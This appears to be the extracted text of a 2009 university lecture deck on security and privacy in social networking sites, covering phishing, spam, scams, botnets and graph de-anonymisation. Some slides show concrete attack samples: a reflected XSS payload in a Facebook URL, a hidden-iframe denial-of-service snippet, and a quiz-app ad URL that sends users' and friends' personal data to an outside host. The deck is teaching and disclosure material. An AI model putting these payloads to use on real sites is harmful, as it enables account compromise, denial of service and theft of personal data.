Social Networks and Security Checkpoint Sep 7, 2009 Joseph - - PowerPoint PPT Presentation

social networks and security
SMART_READER_LITE
LIVE PREVIEW

Social Networks and Security Checkpoint Sep 7, 2009 Joseph - - PowerPoint PPT Presentation

Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory Hack #1: Photo URL Forging Photo Exploits: PHP parameter fiddling (Ng, 2008) Hack #1: Photo URL Forging Photo Exploits: Content Delivery Network URL


slide-1
SLIDE 1

Social Networks and Security

Checkpoint Sep 7, 2009

Joseph Bonneau, Computer Laboratory

slide-2
SLIDE 2

Hack #1: Photo URL Forging

Photo Exploits: PHP parameter fiddling (Ng, 2008)

slide-3
SLIDE 3

Hack #1: Photo URL Forging

Photo Exploits: Content Delivery Network URL fiddling

slide-4
SLIDE 4

Overview

  • I. The Social Network Ecosystem
  • II. Security

III.Privacy

slide-5
SLIDE 5

A Brief History

  • SixDegrees.com, 1997
  • Friendster, 2002
  • MySpace, 2003
  • Facebook, 2004
  • Twitter, 2006
  • Definitive account: danah boyd and Nicole Ellison “Social Network

Sites: Definition, History, and Scholarship,” 2007

slide-6
SLIDE 6

Exponential Growth

slide-7
SLIDE 7

Facebook is Everywhere...

Freetown Christiania (Copenhagen, Denmark)

slide-8
SLIDE 8

Demographics

Still fairly dominated by youth

slide-9
SLIDE 9

Demographics

Rapid growth in older demographics

slide-10
SLIDE 10

Global Growth

slide-11
SLIDE 11

Global Players (11/2008)

Credit: oxyweb.co.uk

slide-12
SLIDE 12

Global Players (4/2009)

Credit: Vincenzo Cosenza

slide-13
SLIDE 13

American Control

slide-14
SLIDE 14

Why Worry About Social Networks?

Just LAMP websites where you list your friends...

slide-15
SLIDE 15

The Surprising Depth of Facebook

Facebook Stream

slide-16
SLIDE 16

The Surprising Depth of Facebook

Facebook Applications

slide-17
SLIDE 17

The Surprising Depth of Facebook

Facebook Connect

slide-18
SLIDE 18

Web 2.0?

Function Internet version HTML, JavaScript FBML DB Queries SQL FBQL Email SMTP FB Mail Forums Usenet, etc. FB Groups Instant Messages XMPP FB Chat News Streams RSS FB Stream Authentication FB Connect Photo Sharing FB Photos Video Sharing FB Video FB Notes Twitter, etc. FB Status Updates FB Points Event Planning FB Events Classified Ads FB Marketplace Facebook version Page Markup OpenID Flickr, etc. YouTube, etc. Blogging Blogger, etc. Microblogging Micropayment Peppercoin, etc. E-Vite craigslist

slide-19
SLIDE 19

From Al Gore to Mark Zuckerberg

Facebook has essentially re-invented the Internet − Centralised − Proprietary − Walled − Strong(er) identity Killer addition is social context

slide-20
SLIDE 20

Parallel Trend: The Addition of Social Context

“Given sufficient funding, all web sites expand in functionality until users can add each other as friends”

slide-21
SLIDE 21

Facebook is the SNS that Matters

Dominant

− Largest and fastest-growing − Most internationally successful − Receives most media attention 

Advanced

− Largest feature-set − Most complex privacy model − Closest representation of real-life social world

slide-22
SLIDE 22

Hack #2: Facebook XSS

http://www.facebook.com/connect/prompt_permissions.php? ext_perm=read_stream

Credit: theharmonyguy

slide-23
SLIDE 23

Hack #2: Facebook XSS

http://www.facebook.com/connect/prompt_permissions.php? ext_perm=1

Credit: theharmonyguy

slide-24
SLIDE 24

Hack #2: Facebook XSS

http://www.facebook.com/connect/prompt_permissions.php? ext_perm=%3Cscript %3Ealert(document.getElementById(%22post_form_id %22).value);%3C/script%3E

Credit: theharmonyguy

slide-25
SLIDE 25

Overview

  • I. The Social Network Ecosystem
  • II. Security

III.Privacy

slide-26
SLIDE 26

SNS Threat Model

slide-27
SLIDE 27

SNS Threat Model

Account compromise

− Email or SNS (practically the same) 

Computer compromise

Monetary Fraud

− Increasingly becoming a payment platform 

Service denial/mischief

slide-28
SLIDE 28

Web 2.0?

Function Internet version HTML, JavaScript FBML DB Queries SQL FBQL Email SMTP FB Mail Forums Usenet, etc. FB Groups Instant Messages XMPP FB Chat News Streams RSS FB Stream Authentication FB Connect Photo Sharing FB Photos Video Sharing FB Video FB Notes Twitter, etc. FB Status Updates FB Points Event Planning FB Events Classified Ads FB Marketplace Facebook version Page Markup OpenID Flickr, etc. YouTube, etc. Blogging Blogger, etc. Microblogging Micropayment Peppercoin, etc. E-Vite craigslist

slide-29
SLIDE 29

The Downside of Re-inventing the Internet

SNSs repeating all of the web's security problems

− Phishing − Spam − 419 Scams & Fraud − Identity Theft/Impersonation − Malware − Cross-site Scripting − Click-Fraud − Stalking, Harassment, Bullying, Blackmail

slide-30
SLIDE 30

Differences in the SNS world

Each has advantages and disadvantages

− Centralisation − Social Connections − Personal Information

slide-31
SLIDE 31

Phishing

Genuine Facebook emails

slide-32
SLIDE 32

Phishing

Phishing attempt, April 30, 2009

slide-33
SLIDE 33

Phishing

Phishing attempt, April 30, 2009

slide-34
SLIDE 34

Phishing

Major Phishing attempts, April 29-30, 2009

− Simple “look at this” messages − Users directed to www.fbstarter.com, www.fbaction.net − Phished credentials used to automatically log in, send more mail − Some users report passwords changed 

Most “elaborate” scheme seen yet

Phishtank reports Facebook 7th most common target

− Behind only banks, PayPal, eBay

slide-35
SLIDE 35

Why SNSs are Vulnerable to Phishing

“Social Phishing” is far more effective

− 72% successful in controlled study (Jagatic et al.) 

No TLS for login page

No anti-phishing measures

Frequent genuine emails with login-links

Users don't consider SNS password as valuable

Web 2.0 sites encourage password sharing...

slide-36
SLIDE 36

Password Sharing

slide-37
SLIDE 37

SNS Phishing Defense

Many advantages over email phishing prevention

− Real-time monitoring − Can block, revoke messages − Block outgoing links 

Fast response to recent attacks

− Emails blocked, removed, sites down within 24 hours

slide-38
SLIDE 38

Spam

Major factor in the decline of MySpace, Friendster

Attractive target

− Can message any user in the system − “Social Spam” much more effective than random spam − Account creation is very cheap

slide-39
SLIDE 39

Spam

slide-40
SLIDE 40

Spam

Many advantages for SNS

− Global monitoring, blocking − Automatically detect spammer profiles − Analyse link history − Analyse graph structure − Analyse profile 

Aggressively request CAPTCHAs

Legal: Facebook won US $873 M award

slide-41
SLIDE 41

Spam

Tough question: Spam vs. Viral Promotion?

Facebook moving to two-classes of user:

− User profiles bound to represent “real people” − Limits on friend count − Limits on usernames − Limits on messages − “Pages” for celebrities, companies, bands, charities, etc. − Most limits removed − Subject to stricter control

slide-42
SLIDE 42

Malware

Koobface worm, launched August 2008

slide-43
SLIDE 43

Scams

Calvin: hey Evan: holy moly. what's up man? Calvin: i need your help urgently Evan: yes sir Calvin: am stuck here in london Evan: stuck? Calvin: yes i came here for a vacation Calvin: on my process coming back home i was robbed inside the hotel i loged in Evan: ok so what do you need Calvin: can you loan me $900 to get a return ticket back home and pay my hotel bills Evan: how do you want me to loan it to you? Calvin: you can have the money send via western union

slide-44
SLIDE 44

Scams

Effective due to social context

− Skilled impersonators should be able to do much better 

Not much can be done to prevent

− Education 

Again, build detection system using social context, history

− Unexpected log-ins − References to Western Union, etc.

slide-45
SLIDE 45

Malware

Koobface worm, launched August 2008

slide-46
SLIDE 46

Malware

Similar to Phishing

− Rapid spread via social context − SNS can use social context to detect − Also, warn users leaving site

slide-47
SLIDE 47

Malware Defense

slide-48
SLIDE 48

Botnet Command & Control

Twitterbot, August 2009

slide-49
SLIDE 49

Botnet Command & Control

Social channels identified in 2009 as optimal for C & C channel

− Particularly Skype, MSN messenger, also Twitter, Facebook − Seen in the wild August 2009 

Can be monitored by service operator, but no incentive

slide-50
SLIDE 50

SNS-hosted botnet

Idea: add malicious JavaScript payload to a popular application

Example: Denial of Service:

<iframe name="1" style="border: 0px none #ffffff; width: 0px; height: 0px;" src="http://victim-host/image1.jpg” </iframe><br/>

“Facebot” - Elias Athanasopoulos, A. Makridakis, D. Antoniades S. Antonatos, Sotiris Ioannidis, K. G. Anagnostakis and Evangelos P. Markatos. “Antisocial Networks: Turning a Social Network into a Botnet,” 2008.

slide-51
SLIDE 51

Common Trends

Social channels increase susceptibility to scams

− Personal information also aids greatly in targeted attacks 

Fundamental issue: SNS environment leads to carelessness

− Rapid, erratic browsing − Applications installed with little scrutiny − Fun, noisy, unpredictable environment − People use SNS with their brain turned off

slide-52
SLIDE 52

Common Trends

  • Centralisation helps in prevention

− Complete control of messaging platform, blocking, revocation

  • Social Context also useful

− Can develop strong IDS

slide-53
SLIDE 53

Web Hacking

Most SNS have a poor security track record

− Rapid growth − Complicated site design − Many feature interactions 

Lack of attention to security

− Over half of sites failing even to deploy TLS properly!

slide-54
SLIDE 54

FBML Translation

Facebook Markup Language Result: arbitrary JavaScript execution (Felt, 2007) Translated into HTML:

slide-55
SLIDE 55

Facebook Query Language

Facebook Query Language Exploits (Bonneau, Anderson, Danezis, 2009)

slide-56
SLIDE 56

Hack #3: Facebook XSRF/Automatic Authentication

Credit: Ronan Zilberman

slide-57
SLIDE 57

Overview

  • I. The Social Network Ecosystem
  • II. Security

III.Privacy

slide-58
SLIDE 58

Data of Interest

slide-59
SLIDE 59

Data of Interest

Profile Data

− Loads of PII (contact info, address, DOB) − Tastes, preferences 

Graph Data

− Friendship connections − Common group membership − Communication patterns 

Activity Data

− Time, frequency of log-in, typical behavior

slide-60
SLIDE 60

Interested Parties

Data Aggregation

− Marketers, Insurers, Credit Ratings Agencies, Intelligence, etc. − SNS operator implicitly included − Often, graph information is more important than profiles 

Targeted Data Leaks

− Employers, Universities, Fraudsters, Local Police, Friends, etc. − Usually care about profile data and photos

slide-61
SLIDE 61

Major Privacy Problems

Data is shared in ways that most users don't expect

“Contextual integrity” not maintained

Three main drivers:

− Poor implementation − Misaligned incentives & economic pressure − Indirect information leakage

slide-62
SLIDE 62

Poor Implementation

slide-63
SLIDE 63

Poor Implementation

Orkut Photo Tagging

slide-64
SLIDE 64

Poor Implementation

Facebook Connect

slide-65
SLIDE 65

Poor Implementation

Applications given full access to profile data of installed users

Even less revenue available for application developers...

slide-66
SLIDE 66

Poor Implementation

Better architectures proposed

− Privacy by proxy − Privacy by sandboxing

slide-67
SLIDE 67

Economic Pressure

Most SNSs still lose money

− Advertising business model yet to prove its viability 

Grow first, monetize later

− “Growth is primary, revenue is secondary” - Mark Zuckerberg 

Privacy is often an impediment to new features

slide-68
SLIDE 68

Economic Pressure

Major survey of 45 social networks' privacy practices

Key Conclusions:

− “Market for privacy” fundamentally broken − Huge network effects, lock-in, lemons market − Sites with better privacy less likely to mention it!

slide-69
SLIDE 69

Promotional Techniques

slide-70
SLIDE 70

Promotional Techniques

slide-71
SLIDE 71

Terms of Service

Most Terms of Service reserve broad rights to user data

Terms of Service, hi5:

slide-72
SLIDE 72

Information leaked by the Social Graph...

slide-73
SLIDE 73

“Traditional” Social Network Analysis

  • Performed by sociologists, anthropologists, etc. since the 70's
  • Use data carefully collected through interviews & observation
  • Typically < 100 nodes
  • Complete knowledge
  • Links have consistent meaning
  • All of these assumptions fail badly for online social network data
slide-74
SLIDE 74

Traditional Graph Theory

  • Nice Proofs
  • Tons of definitions
  • Ignored topics:
  • Large graphs
  • Sampling
  • Uncertainty
slide-75
SLIDE 75

Models Of Complex Networks From Math & Physics

Many nice models

  • Erdos-Renyi
  • Watts-Strogatz
  • Barabasi-Albert

Social Networks properties:

  • Power-law
  • Small-world
  • High clustering coefficient
slide-76
SLIDE 76

Real social graphs are complicated!

slide-77
SLIDE 77

When In Doubt, Compute!

We do know many graph algorithms:

  • Find important nodes
  • Identify communities
  • Train classifiers
  • Identify anomalous connections

Major Privacy Implications!

slide-78
SLIDE 78

Privacy Questions

  • What can we infer purely from link structure?
slide-79
SLIDE 79

Privacy Questions

  • What can we infer purely from link structure?

A surprising amount!

  • Popularity
  • Centrality
  • Introvert vs. Extrovert
  • Leadership potential
  • Communities
slide-80
SLIDE 80

Privacy Questions

  • If we know nothing about a node but it's neighbours, what can we infer?
slide-81
SLIDE 81

Privacy Questions

  • If we know nothing about a node but its neighbours, what can we infer?

A lot!

  • Gender
  • Political Beliefs
  • Location
  • Breed?
slide-82
SLIDE 82

Privacy Questions

  • Can we anonymise graphs?
slide-83
SLIDE 83
  • Can we anonymise graphs?

Not easily...

  • Seminal result by Backstrom et al.: Active attack needs just 7 nodes
  • Can do even better given user's complete neighborhood
  • Also results for correlating users across networks
  • Developing line of research...

Privacy Questions

slide-84
SLIDE 84

De-anonymisation (active)

B C F A H D G E I

A Social Graph with Private Links

slide-85
SLIDE 85

De-anonymisation (active)

B C F 3 2 4 A 1 H D G 5 E I

Attacker adds k nodes with random edges

slide-86
SLIDE 86

De-anonymisation (active)

B C F 3 2 4 A 1 H D G 5 E I

Attacker links to targeted nodes

slide-87
SLIDE 87

De-anonymisation (active)

Graph is anonymised and edges are released

slide-88
SLIDE 88

De-anonymisation (active)

3 2 4 1 5

Attacker searches for unique k-subgroup

slide-89
SLIDE 89

De-anonymisation (active)

3 2 4 1 H G 5

Link between targeted nodes is confirmed

slide-90
SLIDE 90

De-anonymisation (passive)

  • Similar to above, except k normal users collude and share their links
  • Only compromise random targets
slide-91
SLIDE 91

De-anonymisation results

  • 7 nodes need to be created in active attack
  • De-anonymize 70 chosen nodes!
  • 7 nodes in passive coalition compromise ~ 10 random nodes
slide-92
SLIDE 92

Cross-graph De-anonymisation

  • Goal: identify users in a private graph by mapping to public graph
  • “Shouldn't” work: graph isomorphism is NP-complete
  • Works quite well in practice on real graphs!
slide-93
SLIDE 93

Cross-graph De-anonymisation

Public Graph Private Graph

slide-94
SLIDE 94

Cross-graph De-anonymisation

A C B A' C' B'

Public Graph Private Graph Public Graph Step 1: Identify Seed Nodes

slide-95
SLIDE 95

Cross-graph De-anonymisation

A D C B A' D' C' B'

Public Graph Private Graph Public Graph Step 2: Assign mappings based on mapped neighbors

slide-96
SLIDE 96

Cross-graph De-anonymisation

A D C E B A' D' C' E' B'

Public Graph Private Graph Public Graph Step 3: Iterate

slide-97
SLIDE 97

Cross-graph De-anonymisation

  • Demonstrated on Twitter and Flickr
  • Only 24% of Twitter users on Flickr, 5% of Twitter users on Flickr
  • 31% of common users identified (~9,000) given just 30 seeds!
  • Real-world attacks can be much more powerful
  • Auxiliary knowledge
  • Mapping of attributes, language use, etc.
slide-98
SLIDE 98

Privacy Questions

  • What can we infer if we “compromise” a fraction of nodes?
slide-99
SLIDE 99
  • What can we infer if we “compromise” a fraction of nodes?

A lot...

  • Common theme: small groups of nodes can see the rest
  • Danezis et al.
  • Nagaraja
  • Korolova et al.
  • Bonneau et al.

Privacy Questions

slide-100
SLIDE 100
  • What if we get a subset of neighbours for all nodes?

Privacy Questions

slide-101
SLIDE 101
  • What if we get a subset of k neighbours for all nodes?

Emerging question for many social graphs

  • Facebook and online SNS
  • Mobile SNS

Privacy Questions

slide-102
SLIDE 102

A Quietly Introduced Feature...

Public Search Listings, Sep 2007

slide-103
SLIDE 103

Attack Scenario

  • Spider all public listings
  • Our experiments crawled 250 k users daily
  • Implies ~800 CPU-days to recover all users
  • Use sampled graph to compute functions of original
slide-104
SLIDE 104

Estimating Degrees

3 3 3 4 4 2 1 2 6

Average Degree: 3.5

slide-105
SLIDE 105

Estimating Degrees

3 3 3 4 4 2 1 2 6

Sampled with k=2

slide-106
SLIDE 106

Estimating Degrees

? ? ? ? ? ? 1 ? ?

Degree known exactly for one node

slide-107
SLIDE 107

Estimating Degrees

3.5 3.5 1.75 3.5 5.25 1.75 1 1.75 7

Naïve approach: Multiply in-degree by average degree / k

slide-108
SLIDE 108

Estimating Degrees

3.5 3.5 2 3.5 5.25 2 1 2 7

Raise estimates which are less than k

slide-109
SLIDE 109

Estimating Degrees

3.5 3.5 2 3.5 5.25 2 1 2 7

Nodes with high-degree neighbors underestimated

slide-110
SLIDE 110

Estimating Degrees

3.5 3.5 3.5 3.5 5.25 2 1 2 7

Iteratively scale by current estimate / k in each step

slide-111
SLIDE 111

Estimating Degrees

2.75 2.75 3.5 3.63 5.5 2 1 2 5.5

After 1 iteration

slide-112
SLIDE 112

Estimating Degrees

2.68 2.68 3.41 3.53 5.35 2 1 2 5.35

Normalise to estimated total degree

slide-113
SLIDE 113

Estimating Degrees

2.48 2.83 3.04 3.64 5.09 2 1 2 5.91

Convergence after n > 10 iterations

slide-114
SLIDE 114

Estimating Degrees

  • Converges fast, typically after 10 iterations
  • Absolute error is high—38% average
  • Reduced to 23% for nodes with d ≥ 50
  • Still accurately can pick high degree nodes
slide-115
SLIDE 115

Aggregate of x highest-degree nodes

slide-116
SLIDE 116
  • Node Degree
  • Dominating Set
  • Betweenness Centrality
  • Path Length
  • Community Structure

Approximable Functions

slide-117
SLIDE 117

Conclusions

 Social networking coming to dominate the web  Many old security lessons being re-learned  Social context changes fraud environment  Social graph challenging privacy requirements

slide-118
SLIDE 118

Hack #4: Application Data Theft

What happens when you take a quiz...

slide-119
SLIDE 119

Hack #4: Application Data Theft

Facebook Application Architecture

slide-120
SLIDE 120

Hack #4: Application Data Theft

URL for banner ad

http://sochr.com/i.php&name=[Joseph Bonneau]&nx=[My User ID]&age=[My DOB]&gender=[My Gender]&pic=[My Photo URL]&fname0=[Friend #1 Name 1]&fname1=[Friend #2 Name]&fname2=[Friend #3 Name]&fname3=[Friend #4 Name]&fpic0=[Friend #1 Photo URL]&fpic0=[Friend #2 Photo URL]&fpic0=[Friend #3 Photo URL]&fpic0=[Friend #4 Photo URL]&fb_session_params=[All of the quiz application's session parameters]

slide-121
SLIDE 121

Hack #4: Application Data Theft

Query made by banner ad through user's browser

select uid, birthday, current_location, sex, first_name, name, pic_square, relationship_status FROM user WHERE uid IN (select uid2 from friend where uid1 = ‘[current user id]‘) and strlen(pic) > 0

  • rder by rand() limit 500
slide-122
SLIDE 122

Hack #4: Application Data Theft

What the users sees...

slide-123
SLIDE 123

My Reading List

  • http://www.cl.cam.ac.uk/~jcb82/sns_bib/main.html
  • Questions?